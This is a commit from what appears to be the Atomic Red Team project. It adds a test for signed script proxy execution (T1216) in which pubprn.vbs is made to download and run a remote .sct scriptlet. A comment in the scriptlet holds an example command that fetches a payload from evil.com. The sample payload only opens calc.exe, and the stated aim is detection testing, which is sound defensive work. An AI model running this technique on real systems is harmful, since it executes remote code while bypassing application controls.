T1216 Signed Script Proxy Execution (#364)
* T1088 Bypass User Account Control * Removed a stray character * T1216 Signed Script Proxy Execution * Revert "Removed a stray character" This reverts commit 5ad18700b6239504d9db43942ca90873a18ba8c4. * Revert "T1088 Bypass User Account Control" This reverts commit c675c4d91c6a9469734a080841ee622f4b53d856.
This commit is contained in:
Tony M Lambert
committed by
Zac Brown
Zac Brown
parent
27619d3895
commit
f82f953822
@@ -0,0 +1,22 @@
|
||||
---
|
||||
attack_technique: T1216
|
||||
display_name: Signed Script Proxy Execution
|
||||
|
||||
atomic_tests:
|
||||
- name: PubPrn.vbs Signed Script Bypass
|
||||
description: |
|
||||
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
input_arguments:
|
||||
remote_payload:
|
||||
description: A remote payload to execute using PubPrn.vbs.
|
||||
type: Url
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
|
||||
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: |
|
||||
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
|
||||
@@ -0,0 +1,23 @@
|
||||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
<registration
|
||||
progid="PoC"
|
||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<!-- cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://evil.com/payload.sct" -->
|
||||
|
||||
<!-- .sct files when downloaded, are executed from a path like this -->
|
||||
<!-- Please Note, file extenstion does not matter -->
|
||||
<!-- Though, the name and extension are arbitary.. -->
|
||||
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||
<!-- You can either execute locally, or from a url -->
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
// calc.exe should launch, this could be any arbitrary code.
|
||||
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
</scriptlet>
|
||||
Reference in New Issue
Block a user